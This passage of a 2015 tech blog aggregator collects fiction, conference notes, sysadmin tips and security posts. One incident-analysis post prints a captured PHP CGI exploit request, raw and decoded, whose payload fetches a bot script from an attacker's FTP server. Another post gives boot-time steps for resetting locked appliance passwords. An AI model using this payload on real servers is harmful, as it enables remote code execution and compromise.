— Ça, tu vois, c’est un appeau à emmerdes. Cela signifie que ton appartement va bientôt être rayé de la carte et qu’on doit le quitter au plus vite.
— Hein ?

Son sourire s’est brutalement effacé.

— Mais pourquoi t’as fait ça ?
— Parce que j’espère que Max ou FatNerdz m’enverront une réponse avant l’explosion.
— Et si ils ne le font pas ?
— On aura pas le temps de s’inquiéter.
— Merde ! Merde ! Merde !

Une ligne s’affiche soudainement dans le client IRC.
— Un message privé ! C’est de Max. Un seul mot : « A12-ZZ74 000-000 ». Note-le !
— Ben copie-colle le dans mon logiciel de prise de note.
— Non, on ne doit prendre aucun matériel électronique. Note-le sur un papier.
— Un papier ? T’es comique ! Je n’ai pas ce genre de trucs, je ne suis pas un musée !
— Même dans tes toilettes ?
Il me regarde, étonné.
— Tu as bien du papier dans tes toilettes ? Ne me dit pas que tu te contentes de trois coquillage !
— Ben… Oui, j’ai du papier. Mais avec quoi j’écris ?
— Avec ce que tu trouves dans tes toilettes et qui permet d’écrire sur ce genre de papier, fais-je avec un clin d’œil.
— Mais… c’est absolument dégueulasse !
— Ton appart va sauter d’une minute à l’autre.
— Merde ! Merde !
— C’est le cas de le dire !
— Espèce d’enfoiré, fait-il en se ruant vers la toilette.
J’entends sa voix, étouffée par la porte.
— Répète ce que je dois noter.
— A12-ZZ74 000-000
— A12-ZZ74 000-000 ?
— Oui, c’est bon. On dégage !

Chacun par un bras, nous empoignons Eva qui nage dans son vieux t-shirt trop large. Elle a l’air hébétée mais nous suit sans opposer la moindre résistance. Son déplacement maladroit semble gagner en vigueur. Quatre-à-quatre, nous dévalons les escaliers de secours à l’arrière du bâtiment.

Les escaliers sont rouillés, un vent tourbillonnant ne cesse de me déséquilibrer et je réalise avec effroi que Junior vivait dans l’un des étages les plus élevés. Les moins chers dans ce genre d’immeubles où les ascenseurs ne sont plus assurés.

Chaque marche me semble un calvaire. Histoire de détourner mon attention, je tente de me mettre dans la peau de Georges Farreck. Quelles sont ses motivations ? Quel était son plan depuis le début ? Quel sera son prochain mouvement ? Ne suis-je pas complètement paranoïaque ? N’essaie-t-il pas de m’aider ?

Un drone se met soudainement à voleter autour de nous. Une voix en jaillit.
— Vous utilisez les escaliers de secours sans qu’aucune alerte n’aie été enregistrée. Veillez me montrer votre visage et énoncer la raison de votre présence.
— Il ne reconnait pas nos visages grâce à ton maquillage, murmuré-je en tournant le dos au drone.
— Il n’a sans doute pas encore contacté le central, me répond Junior. Si on arrive à activer le killswitch en le retournant, il va s’éteindre et s’écraser 30 étages plus bas.
— Problème, il se tient hors d’atteinte, à plus d’un mètre de la balustrade.
— J’ai fait ce genre de choses à l’entrainement.

Junior m’adresse un clin d’œil et, soudainement, saute sur la barrière tout se jetant dans le vide les pieds en avant. Au dernier moment, ses mains s’accrochent à la balustrade tandis que, d’un prodigieux coup de bassin, il a saisit le drone entre ses chevilles et le retourne. L’engin automatique tombe aussitôt comme une pierre tandis que Junior reste suspendu du bout des doigts.
— Aaaaah ! hurle-t-il.
Ses doigts résistent une seconde avant de céder et de s’entrouvrir, le précipitant dans une chute mortelle.

 

Photo par Ioan Sameli.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at July 06, 2015 06:57 PM

July 05, 2015

Mattias Geniar

Rewriting software from scratch, a lesson learned from Mac OSX 10.10.4’s discoveryd

The post Rewriting software from scratch, a lesson learned from Mac OSX 10.10.4’s discoveryd appeared first on ma.ttias.be.

I've been struggling with slow logins when on an active directory domain on my Mac. I've tried pretty much everything, but nothing really seems to solve it permanently. I've sort of become accustomed to the problem, accepting it as-is.

But I'm hoping the Mac OSX 10.10.4 update that was just released will resolve this for me, at last.

Most of the internet agrees that the introduction of discoveryd in Mac OSX has been a failure. It was meant to replace a very old DNS resolving tool called mDNSResponder, but it never lived up to the expectation.

As a Mac user, I had never experienced problems with the "old" mDNSResponder. There may have been a few edge-cases I was unaware of, sure. But to me, it just seemed to work. Before Mac OSX 10.10, I never experienced any of the declining software quality concerns others had raised.

Now enter Mac OSX 10.10. Apple completely rewrote the mDNSResponder and replaced it with discoveryd. From the ground up.

Here's a processlist of Mac OSX 10.10.3.

$  ps -ef | grep discoveryd
   65    74  Fri10am /usr/libexec/discoveryd --udsocket standard --loglevel Basic --logclass Everything --logto asl
    0   274  Fri10am /usr/libexec/discoveryd_helper --loglevel Detailed --logclass Everything --logto asl

Before 10.10, and now back with the release of 10.10.4, mDNSResolver is running.

$ ps -ef | grep mDNS
   65    91     1   0 12:43pm ??         0:00.44 /usr/sbin/mDNSResponder

Ars Technica has a pretty good summary of the supposed reasons for the rewrite and the gotcha's, this in particular.

As of OS X 10.10, mDNSResponder has been replaced by discoveryd. Curiously, discoveryd is (re)written in C++, not exactly one of Apple's favorite languages.

Why DNS in OS X 10.10 is broken, and what you can do to fix it

Apple's move here deserves a repeat of what Joel on Software has been preaching for a very long time.

There's a subtle reason that programmers always want to throw away the code and start over. The reason is that they think the old code is a mess. And here is the interesting observation: they are probably wrong. The reason that they think the old code is a mess is because of a cardinal, fundamental law of programming:

It's harder to read code than to write it.

Things You Should Never Do, Part I

Since to the outside world, there didn't seem to be any reason to replace mDNSResponder, the move must have come from the inside. Engineers wanting to replace ageing software with something new.

In particular, Joel's 15 year old blogpost (!!) notes that rewriting software always destroys some of the gathered knowledge: years of bug fixing and feature adding.

When you throw away code and start from scratch, you are throwing away all that knowledge. All those collected bug fixes. Years of programming work.

There are very legit reasons to rewrite software as well. But whenever I'm thinking of rewriting something from scratch, I hope I remember Joel's words and Apple's fiasco.

The post Rewriting software from scratch, a lesson learned from Mac OSX 10.10.4’s discoveryd appeared first on ma.ttias.be.

by Mattias Geniar at July 05, 2015 11:09 AM

July 03, 2015

Xavier Mertens

BSidesLisbon 2015 Wrap-Up

BSidesLisbonHere is a quick wrap-up about the just-ended BSidesLisbon event. This is the second edition of this BSides event organized in Portugal. The philosophy of those events is well known: organized by and for the community, free, open and creating a lot of opportunities to meet peers. A classic but effective organization: talks, lightning talks, a CTF but two tracks in parallel. Here is a review of the ones I attended.

The day started with my friend Wim Remes‘s keynote: “Damn kids, they’re all alike“. Wim’s message was: “learn and share”. He started with a review of the hacker’s manifesto. Written in 1986, it remains so relevant today. Key values are:

Wim addressed the problem of the Infosec community vs the industry. If a clear distinction is mandatory, at a certain time, we need to move forward and take our responsibilities by putting our knowledge into companies/organizations. If some security researchers are seen as rockstars (or want to be one), that’s not the best way to behave. Some Wim’s slides were nice with good quotes. I particularly liked this one:

Your knowledge is a weapon, you are a threat

The keynote was followed by a series of very interesting questions and exchange of ideas.

The first talk was given by Doron Shiloach from IBM X-Force: “Taking threat intelligence to the next level”. Doron started with a review of  the threat intelligence topic, based on a definition by Gartner. From an industry perspective, criteria for evaluation are:

The next part was dedicated to the techniques to built a good threat intelligence, where to find the right information. Once done, we need to make it available. Not only between humans but also between computers. To achieve this, Doron introduced Taxii and STIX. Personally, I found the talk to focused on IBM X-Force services… but anyway, interesting stuff was presented.

For the next time slot, there was only one presentation, the other speaker was not able to attend the event. The tool Shellter was presented by its developer Kyriakos Economou. After explaining why classical shell code injection sucks, Kyriakos’s tool was presented in details. Shellter is a dynamic shell injector with only one goal: evade antivirus detection! The presentation ended with nice demos of malicious generated files not being detected by AV products! The joy of seeing a scan result on virustotal.com: 0/55!

After the lunch break, I followed Ricardo Dias‘s presentation about malware clustering. By cluster, we mean here a group of malwares that share similar structures or behavior. Ricardo’s daily job is to detect malicious code and, to improve this task, he developed a tool to create clusters based on multiple information about the PE files (only this file type is analyzed). Ricardo explained in details how clusters are created. He used popular algorithms for this: reHash or impHash. The next part of the presentation was based on demos of the tool created by Ricardo. I was impressed by the quality and accuracy of the information make available through the clusters!

The next talk was also focusing on security visualization. Tiago Henriques and Tiago Martins presented “Security Metrics: Why, where and how?“. Seeing the amount of data that we have to manage today and the multiple sources, it became very difficult to be able to analyze them without proper tools. That was the topic presented by Tiago & Tiago. After explaining how to use visualization tools in the right way and answering questions like:

They demonstrated how to extract nice information from important datasets.

Then, Pedro Vilaça presented his research about malicious kernel modules in OSX: “BadXNU, a rotten apple!“. For sure, never, never left your Macbook unattended close to Pedro! Normally, to load a new module to the OSX kernel, checks are performed like verifying the module signature. Pedro explained how to bypass this and inject malicious code into the kernel. For Pedro, Apple is doing bad controls and tests should be performed at ring 0 (kernel level) and not in userland! (like Microsoft does). Impressive talk!

Finally, my last talk was the one of Tiago Pereira: “What botnet is this?“. The talk was a resume of a malware analysis involving DGA or “Domain Generation Algorithm“. The goal was to perform the reverse engineering of the malware to understand the DGA algorithm used. Also very interesting, especially when he explained how to bypass the packing of the binary to extract the code!

Unfortunately, I was not able to attend the last keynote presented by Steve Lord, I hope that the slides will be available somewhere. The day ended with the speaker dinner (thanks for the organizers for the invitation!) in a relaxed atmosphere. Now, it’s the weekend and I’ll spend some good times with my wife in the sunny Lisbon!

by Xavier at July 03, 2015 10:06 PM

Dieter Plaetinck

Focusing on open source monitoring. Joining raintank.

Goodbye Vimeo

It's never been as hard saying goodbye to the people and the work environment as it is now.
Vimeo was created by dedicated film creators and enthusiasts, just over 10 years ago, and today it still shows. From the quirky, playful office culture, the staff created short films, to the tremendous curation effort and staff picks including monthly staff screenings where we get to see the best of the best videos on the Internet each month, to the dedication towards building the best platform and community on the web to enjoy videos and the uncompromising commitment to supporting movie creators and working in their best interest.
Engineering wise, there has been plenty of opportunity to make an impact and learn.
Nonetheless, I have to leave and I'll explain why. First I want to mention a few more things.

vimeo goodbye drink

In Belgium I used to hitchhike to and from work so that each day brought me opportunities to have conversations with a diverse, fantastic assortment of people. I still fondly remember some of those memories. (and it was also usually faster than taking the bus!)
Here in NYC this isn't really feasible, so I tried the next best thing. A mission to have lunch with every single person in the company, starting with those I don't typically interact with. I managed to have lunch with 95 people, get to know them a bit, find some gems of personalities and anecdotes, and have conversations on a tremendous variety of subjects, some light-hearted, some deep and profound. It was fun and I hope to be able to keep doing such social experiments in my new environment.

Vimeo is also part of my life in an unusually personal way. When I came to New York (my first ever visit to the US) in 2011 to interview, I also met a pretty fantastic woman in a random bar in Williamsburg. We ended up traveling together in Europe, I decided to move the US and we moved in together. I've had the pleasure of being submerged in both American and Greek culture for the last few years, but the best part is that today we are engaged and I feel like the luckiest guy in the world. While I've tried to keep work and personal life somewhat separate, Vimeo has made an undeniable ever lasting impact on my life that I'm very grateful for.

At Vimeo I found an area where a bunch of my interests converge: operational best practices, high performance systems, number crunching, statistics and open source software. Specifically, timeseries metrics processing in the context of monitoring. While I have enjoyed my opportunity to make contributions in this space to help our teams and other companies who end up using my tools, I want to move out of the cost center of the company, I want to be in the department that creates the value. If I want to focus on open source monitoring, I should align my incentives with those of my employer. Both for my and their sake. I want to make more profound contributions to the space. The time has come for me to join a company for which the main focus is making open source monitoring better.

Hello raintank!

Over the past two years or so I've talked to many people in the industry about monitoring, many of them trying to bring me into their team. I never found a perfect fit but as we transitioned from 2014 into 2015, the stars seemingly aligned for me. Here's why I'm very excited to join the raintank crew:

OK, so what am I really up to?

Grafana is pretty much the leading open source metrics dashboard right now. So it only makes sense that raintank is a heavy Grafana user and contributor. My work, logically, revolves around codifying some of the experience and ideas I have, and making them accessible through the polished interface that is Grafana, which now also has a full time UX designer working on it. Since according to the Grafana user survey alerting is the most sorely missed non-feature of Grafana, we are working hard on rectifying this and it is my full-time focus. If you've followed my blog you know I have some thoughts on where the sweet spot lies in clever alerting. In short, take the claims of anomaly detection via machine learning with a big grain of salt, and instead, focus on enabling operators to express complex logic simply, quickly, and in an agile way. My latest favorite project, bosun exemplifies this approach (highly recommend giving this a close look).

The way I'm thinking of it now, the priorities (and sequence of focus) for alerting within Grafana will probably be something like this:

There's a lot of thought work, UX and implementation details around this topic, I've created a github ticket to kick off a discussion and am curious to hear your thoughts. Finally, if any of this sounds interesting to you, you can sign up to the grafana newsletter or the raintank newsletter which will get you info on the open source platform as well as the SaaS product. Both are fairly low volume.


office sausolito It may look like I'm not doing much from my temporary Mill Valley office, but trust me, cool stuff is coming!

July 03, 2015 04:22 PM

Frank Goossens

Music from Our Tube; the Jadim De Castro groove

Junior Jack’s E-Samba is a nice dance-classic, but the groove, melody and lyrics were written a long time ago by Jadim De Castro as “Negra Sem Sandalia” and was featured in “Orfeu Negro“, a re-interpretation of the Greek legend of Orpheus and Eurydice by Marcel Camus, set in the context of Brazil carnival.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 03, 2015 02:53 PM

July 02, 2015

Dieter Plaetinck

Moved blog to hugo, fastly and comma

July 02, 2015 11:35 PM

July 01, 2015

Dries Buytaert

One year later: the Acquia Certification Program

A little over a year ago we launched the Acquia Certification Program for Drupal. We ended up the first year with close to 1,000 exams taken, which exceeded our goal of 300-600. Today, I'm pleased to announce that the Acquia Certification Program passed another major milestone with over 1,000 exams passed (not just taken).

People have debated the pros and cons of software certifications for years (including myself) so I want to give an update on our certification program and some of the lessons learned.

Acquia's certification program has been a big success. A lot of Drupal users require Acquia Certification; from the Australian government to Johnson & Johnson. We also see many of our agency partners use the program as a tool in the hiring process. While a certification exam can not guarantee someone will be great at their job (e.g. we only test for technical expertise, not for attitude), it does give a frame of reference to work from. The feedback we have heard time and again is how the Acquia Certification Program is tough, but fair; validating skills and knowledge that are important to both customers and partners.

We also made the Certification Magazine Salary Survey as having one of the most desired credentials to obtain. To be a first year program identified among certification leaders like Cisco and Red Hat speaks volumes on the respect our program has established.

Creating a global certification program is resource intensive. We've learned that it requires the commitment of a team of Drupal experts to work on each and every exam. We now have four different exams: developer, front-end specialist, backend specialist and site builder. It roughly takes 40 work days for the initial development of one exam, and about 12 to 18 work days for each exam update. We update all four of our exams several times per year. In addition to creating and maintaining the certification programs, there is also the day-to-day operations for running the program, which includes providing support to participants and ensuring the exams are in place for testing around the globe, both on-line and at test centers. However, we believe that effort is worth it, given the overall positive effect on our community.

We also learned that benefits are an important part to participants and that we need to raise the profile of someone who achieves these credentials, especially those with the new Acquia Certified Grand Master credential (those who passed all three developer exams). We have a special Grand Master Registry and look to create a platform for these Grand Masters to help share their expertise and thoughts. We do believe that if you have a Grand Master working on a project, you have a tremendous asset working in your favor.

At DrupalCon LA, the Acquia Certification Program offered a test center at the event, and we ended up having 12 new Grand Masters by the end of the conference. We saw several companies stepping up to challenge their best people to achieve Grand Master status. We plan to offer the testing at DrupalCon Barcelona, so take advantage of the convenience of the on-site test center and the opportunity to meet and talk with Peter Manijak, who developed and leads our certification efforts, myself and an Acquia Certified Grand Master or two about Acquia Certification and how it can help you in your career!

by Dries at July 01, 2015 01:31 PM

June 29, 2015

Lionel Dricot

Les 5 réponses à ceux qui veulent préserver l’emploi

3226545588_0994d1ddba_z

 

Si vous avez été redirigé vers cette page, c’est que d’une manière ou d’une autre vous vous êtes inquiété pour la préservation d’un type d’emploi voire que vous avez même proposé des idées pour sauvegarder ou créer de l’emploi.

Les 5 arguments contre la préservation de l’emploi

Chacun des arguments peut être approfondi en cliquant sur le ou les liens appropriés.

1. La technologie a pour but premier de nous faciliter la vie et, en conséquence, de réduire notre travail. Détruire l’emploi n’est donc pas une conséquence de quoi que ce soit, c’est le but premier que recherche notre espèce depuis des millénaires ! Et nous sommes en train de réussir ! Pourquoi voudrions-nous revenir en arrière afin d’atteindre l’inefficace plein-emploi ?

2. Le fait de ne pas travailler n’est pas un problème. C’est le fait de ne pas avoir d’argent pour vivre qui l’est. Nous avons malheureusement tendance à confondre le travail et le social. Nous sommes convaincus que seul le travail rapporte de l’argent mais c’est une croyance complètement erronée. Pour approfondir : Qu’est-ce que le travail ?

3. Vouloir créer de l’emploi revient à creuser des trous pour les reboucher. C’est non seulement stupide, c’est également contre-productif et revient à construire la société la plus inefficace possible !

4. Si créer/préserver l’emploi est un argument recevable dans un débat, alors absolument tout peut être justifiable : depuis la destruction de nos ressources naturelles à la torture et la peine de mort en passant par le sacrifice de milliers de vies sur les routes. C’est ce que j’appelle l’argument du bourreau.

5. Quel que soit votre métier, il pourra être fait mieux, plus vite et moins cher par un logiciel dans la décennie qui vient. C’est bien sûr évident quand on pense aux chauffeurs de taxi/Uber mais cela comprend également les artistes, les politiciens et même les chefs d’entreprises.

 

Conclusion : s’inquiéter pour l’emploi est dangereusement rétrograde. Ce n’est pas facile car on nous bourre le crâne avec cette superstition mais il est indispensable de passer à l’étape suivante. Que l’on apprécie l’idée ou pas, nous sommes déjà dans une société où tout le monde ne travaille pas. C’est un fait et le futur n’a que faire de votre opinion. La question n’est donc pas de créer/préserver l’emploi mais de s’organiser dans une société où l’emploi est rare.

Personnellement, je pense que le revenu de base, sous une forme ou une autre, est une piste à explorer sérieusement.

 

Photo par Friendly Terrorist.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 29, 2015 06:51 PM

Bert de Bruijn

How to solve "user locked out due to failed logins" in vSphere vMA

In vSphere 6, if the vi-admin account get locked because of too many failed logins, and you don't have the root password of the appliance, you can reset the account(s) using these steps:

  1. reboot the vMA
  2. from GRUB, "e"dit the entry
  3. "a"ppend init=/bin/bash
  4. "b"oot
  5. # pam_tally2 --user=vi-admin --reset
  6. # passwd vi-admin # Optional. Only if you want to change the password for vi-admin.
  7. # exit
  8. reset the vMA
  9. log in with vi-admin
These steps can be repeated for root or any other account that gets locked out.

If you do have root or vi-admin access, "sudo pam_tally2 --user=mylockeduser --reset" would do it, no reboot required.

by Bert de Bruijn (noreply@blogger.com) at June 29, 2015 01:13 PM

Laurent Bigonville

systemd integration is the “ps” command

In Debian, since version 2:3.3.10-1, the procps package has the systemd integration bits enabled. This means that now the “ps” command can display which (user) unit has started a process or to which slice or scope it belongs.

For example with the following command:

ps  -eo pid,user,command,unit,uunit,slice

ps-systemd

by bigon at June 29, 2015 10:29 AM

June 27, 2015

Mattias Geniar

The Broken State of Trust In Root Certificates

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

Yesterday news came out that Microsoft has quietly pushed new Root Certificates via its Windows Update system.

The change happened without any notifications, without any KB and without anyone really paying attention to it.

Earlier this month, Microsoft has quietly started pushing a bunch of new root certificates to all supported Windows systems. What is concerning is that they did not announce this change in any KB article or advisory, and the security community doesn't seem to have noticed this so far.

Even the official Microsoft Certificate Program member list makes no mention of these changes whatsoever.

Microsoft quietly pushes 18 new trusted root certificates

This just goes to show how fragile our system of trust really is. Adding new Root Certificates to an OS essentials gives the owner of that certificate (indirect) root privileges on the system.

It may not allow direct root access to your machines, but it allows them to publish certificates your PC/server blindly trusts.

This is an open door for phishing attacks with drive-by downloads.

I think this demonstrates 2 very major problems with SSL Certificates we have today:

  1. Nobody checks which root certificates are currently trusted on your machine(s).
  2. Our software vendors can push new Root Certificates in automated updates without anyone knowing about it.

Both problems come back to the basis of trust.

Should we blindly trust our OS vendors to be able to ship new Root Certificates without confirmation, publication or dialog?

Or do we truly not care at all, as demonstrated by the fact we don't audit/validate the Root Certificates we have today?

The post The Broken State of Trust In Root Certificates appeared first on ma.ttias.be.

by Mattias Geniar at June 27, 2015 12:53 PM

June 26, 2015

Xavier Mertens

Attackers Make Mistakes But SysAdmins Too!

Keep Calm & Avoid ErrorsA few weeks ago I blogged about “The Art of Logging” and explained why it is important to log efficiently to increase changes to catch malicious activities. They are other ways to catch bad guys, especially when they make errors, after all they are humans too! But it goes the other way around too with system administrators. Last week, a customer asked me to investigate a suspicious alert reported by an IDS. It looked like an restricted web server (read: which was not supposed to be publicly available!) was hit by an attack coming from the wild Internet.

The attack had nothing special, it was a bot scanning for websites vulnerable to the rather old PHP CGI-BIN vulnerability (CVE-2012-1823). The initial HTTP request looked strange:

POST
//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%
75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F
%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%
66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6
E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A
%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%
3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3
D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: -c
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Oracle-ECID: 252494263338,0
ClientIP: xxx.xxx.xxx.xxx
Chronos: aggregate
SSL-Https: off
Calypso-Control: H_Req,180882440,80
Surrogate-Capability: orcl="webcache/1.0 Surrogate/1.0 ESI/1.0 ESI-Inline/1.0 ESI-INV/1.0 ORAESI/9.0.4 POST-Restore/1.0"
Oracle-Cache-Version: 10.1.2
Connection: Keep-Alive, Calypso-Control

<? system("cd /tmp;wget ftp://xxxx:xxxx\@xxx.xxx.xxx.xxx/bot.php"); ?>

Once decoded, the HTTP query looks familiar:

POST //cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input –n

Did you see that the header ‘Host’ contains an invalid value? (‘-c’). I tried to understand this header but for me it’s a bug in the attacker’s code. The RFC2616 covers the HTTP/1.1 protocol and more precisely how requests are formed:

$ nc blog.rootshell.be 80
GET / HTTP/1.1
Host: blog.rootshell.be
HTTP/1.1 200 OK

In the case above, the request was clearly malformed and the reverse proxy sitting in front of the web server decided to forward it to its default web server. If a reverse proxy can’t find a valid host to send the incoming requests, it will use, based on its configuration, the default one. Let’s take an Apache config:

NameVirtualHost *
<VirtualHost *>
DocumentRoot /siteA/
ServerName www.domainA.com
</VirtualHost>
<VirtualHost *>
DocumentRoot /siteB/
ServerName www.domainB.com
</VirtualHost>

In this example, Apache will use the first block if no other matching block is found. If we query a virtual host ‘www.domainC.com‘, we will receive the homepage of ‘www.domainA.com‘. Note that such configuration may expose sensitive data into the wild or expose a vulnerable server to the Internet. To prevent this, always add a default site with an extra block on top of the configuration:

<VirtualHost *>
DocumentRoot /defaultSite/
</VirtualHost>

This site can be configured as a “last resort web page” (like implemented in many load-balancers) and why not run a honeypot to collect juicy data? Conclusion: From an defender point of view, try to isolate invalid queries as much as possible and log everything. From an attacker point of view, always try malformed HTTP queries, maybe you will find interesting web sites hosted on the same server!

by Xavier at June 26, 2015 10:21 PM

Mattias Geniar

RFC 7568: SSL 3.0 Is Now Officially Deprecated

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

The IETF has taken an official stance in the matter: SSL 3.0 is now deprecated.

It's been a long time coming. We've had, as many others, SSL 3.0 disabled on all our servers for multiple years now. And I'm now happy to report the IETF is making the end of SSL 3.0 "official".

The Secure Sockets Layer version 3.0 (SSLv3), as specified in RFC 6101, is not sufficiently secure. This document requires that SSLv3 not be used.

The replacement versions, in particular, Transport Layer Security (TLS) 1.2 (RFC 5246), are considerably more secure and capable protocols.

RFC 7568: Deprecating Secure Sockets Layer Version 3.0

Initiatives like disablessl3.com have been around for quite a while, urging system administrators to disable SSLv3 wherever possible. With POODLE as its most known attack, the death of SSLv3 is a very welcome one.

The RFC targets everyone using SSL 3.0: servers as well as clients.

Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}.

Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.

SSL is dead. Long live TLS 1.2(*).

(*) while it lasts.

The post RFC 7568: SSL 3.0 Is Now Officially Deprecated appeared first on ma.ttias.be.

by Mattias Geniar at June 26, 2015 07:39 PM

Frank Goossens

Music from Our Tube; Souldancing on a Friday

While listening to random old “It is what it is”-shows (Merci Laurent) I heard this re-issue of Heiko Laux‘s Souldancer. No go have some fun you kids!

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at June 26, 2015 11:25 AM

June 25, 2015

Joram Barrez

All Activiti Community Day 2015 Online

As promised in my previous post, here are the recordings of the talks done by our awesome Community people. The order below is the order at which they were planned in the agenda (no favouritism!). Sadly, the camera battery died during the recording of the talks before lunch. As such, the talks of Yannick Spillemaeckers […]

by Joram Barrez at June 25, 2015 12:04 PM

June 23, 2015

Lionel Dricot

Le « gravel » ou quand les cyclistes bouffent du gravier

20150620_141422

Attention, ce bolg est bien un bolg sur le cyclimse. Merci de votre compréhension !

Dans cet article, j’aimerais présenter une discipline cycliste très populaire aux États-Unis : le « gravel grinding », qui signifie littéralement « broyage de gravier », plus souvent appelé « gravel ».

Mais, pour ceux qui ne sont pas familiers avec le vélo, je vais d’abord expliquer pourquoi il y a plusieurs types de vélos et plusieurs façons de rouler en vélo.

 

Les différents types de cyclisme

Vous avez certainement déjà remarqué que les vélos des coureurs du tour de France sont très différents du VTT que vient d’acquérir votre petite nièce.

4805478269_dd774e0a41_z

Un cycliste sur route, par Tim Shields.

En effet, en fonction du parcours, le cycliste sera confronté à des obstacles différents. Sur une longue route dans un environnement venteux, le cycliste sera principalement freiné par la résistance de l’air. Il doit donc être aérodynamique. Sur un étroit lacet de montagne, le cycliste se battra contre la gravité et doit donc être le plus léger possible. Par contre, s’il emprunte un chemin de pierres descendant entre les arbres, le principal soucis du cycliste sera de garder les roues en contact avec le sol et de ne pas casser son matériel. Le vélo devra donc amortir au maximum les chocs et les aspérités du terrain.

Enfin, un vélo utilitaire cherchera lui à maximiser le confort du cycliste et l’aspect pratique du vélo, même au prix d’une baisse drastique des performances.

 

Les compromis technologiques

Aujourd’hui, les vélos sont donc classés en fonction de leur utilisation. Un vélo très aérodynamique sera utilisé pour les compétitions de contre-la-montre ou les triathlons. Pour les courses classiques, les pros utilisent un vélo de route de type “aéro” ou un vélo ultra léger en montagne.

7841128798_7b8c77d742_z

Vélo aérodynamique en contre-la-montre, par Marc

Pour rouler dans les bois, on préfèrera un VTT mais les VTT eux-mêmes se déclinent en plusieurs versions, le plus éloigné du vélo de route étant le vélo de descente qui est très lourd, bardé d’amortisseurs et qui, comme son nom l’indique, ne peut servir qu’en descendant.

Ceci dit, la plupart de ces catégories sont liées à des contraintes technologiques. Ne pourrait-on pas imaginer un vélo ultra-léger (adapté à la montagne) qui soit ultra-aérodynamique (adapté à la route ou au contre-la-montre) et ultra-confortable (adapté à la ville) ? Oui, on peut l’imaginer. Ce n’est pas encore possible aujourd’hui et rien ne dit que ce le sera un jour. Mais ce n’est théoriquement pas impossible.

 

Le compromis physique

Par contre, il existe un compromis qui lui est physiquement indiscutable : le rendement par rapport à l’amortissement. Tout amortissement entraîne une perte de rendement, c’est inévitable.

L’amortissement a deux fonctions : maintenir le vélo en contact avec la route même sur une surface inégale et préserver l’intégrité physique du vélo voire le confort du cycliste.

Le cycliste va avancer en appliquant une force sur la route à travers son pédalier et ses pneus. Le principe d’action-réaction implique que la route applique une force proportionnelle sur le vélo, ce qui a pour effet de le faire avancer.

L’amortissement, lui, a pour objectif de dissiper les forces transmises au vélo par la route. Physiquement, on voit donc bien que rendement et amortissement sont diamétralement opposé.

2213372852_6261e6b987_z

Un vélo de descente, par Matthew.

Pour vous en convaincre, il suffit d’emprunter un vélo pourvu d’amortisseurs et de régler ceux-ci sur amortissement maximal. Tentez ensuite de gravir une route montant fortement pendant plusieurs centaines de mètres. Vous allez immédiatement percevoir que chaque coup de pédale est partiellement amorti par le vélo.

 

Montre-moi tes pneus et je te dirai qui tu es…

L’amortisseur principal présent sur tous les types de vélos sans exception est le pneu. Le pneu est remplit d’air. La compression de l’air atténue les chocs.

Une idée largement répandue veut que les vélos de routes aient des pneus fins car les pneus larges augmentent le frottement sur la route. C’est tout à fait faux. En effet, tous les pneus cherchent à frotter au maximum sur la route car c’est ce frottement qui transmet l’énergie. Un pneu qui ne frotte pas sur la route patine, ce que l’on souhaite éviter à tout prix.

Il a même été démontré que des pneus plus larges permettaient de transmettre plus d’énergie à la route et étaient plus efficaces. C’est une des raisons pour lesquelles les Formule 1 ont des pneus très larges.

Cependant des pneus très larges signifient également plus d’air et donc plus d’amortissement. Les pneus larges dissipent donc plus d’énergie à chaque coup de pédale !

8148010012_1fa18fe3d1_z

Roues de VTT, par Vik Approved.

C’est pourquoi les vélos de route ont des pneus très fin (entre 20 et 28mm d’épaisseur). Ceux-ci sont également gonflés à très haute pression (plus de 6 bars). La quantité d’air étant très petite et très comprimée, l’amortissement est minimal.

Par contre, en se déformant les pneus larges permettent d’épouser les contours d’un sol inégal. En amortissant les chocs, ils sont également moins sensibles aux crevaisons. C’est la raison pour laquelle les VTT ont des pneus qui font généralement plus de 40mm d’épaisseur et qui sont moins gonflés (entre 2 et 4 bars). Des pneus plus fins patineraient (perte d’adhérence) et crèveraient au moindre choc.

En résumé, le pneu est certainement l’élément qui définit le plus un vélo, c’est véritablement sa carte d’identité. Pour en savoir plus, voici un lien très intéressant sur la résistance au roulement des pneus.

 

